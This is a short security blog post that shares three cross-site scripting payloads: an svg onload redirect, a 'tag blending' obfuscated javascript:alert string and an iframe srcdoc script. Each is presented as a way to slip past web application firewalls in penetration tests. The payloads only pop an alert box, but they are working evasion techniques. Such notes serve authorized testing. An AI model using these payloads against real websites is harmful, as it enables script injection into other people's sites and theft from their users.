Week 46 - XSS Payloads
It’s been a while since I’ve shared some Cross-Site Scripting payloads with y’all, so here are some new ones I’ve found in the last couple of months:
<svg onload=location=nextSibling.innerText>
<b>javas<b></b>cript:al<b></b>ert(1)</b>
This one is really interesting as it implements Tag Blending Obfuscation. Notice the keywords ‘javascript’ and ‘alert’ are separated here, which is great for bypassing potential WAFs. When the payload executes, the <b> elements are concatenated, resulting in a good old alert box. You can read more about this technique here: https://lnkd.in/eqhpG_nJ
This next payload was introduced to me by my colleague Evan Isaac:
"><iframe srcdoc="<script>alert(1)</script>">
This is a great payload for when a WAF is blocking HTML event attributes (onclick, onmouseover, etc) as well as standard script tags. Give this a try on your next engagement, and give Evan a follow for sharing!
See more here: https://brutelogic.com.br/blog/tag-blending-obfuscation/
Last updated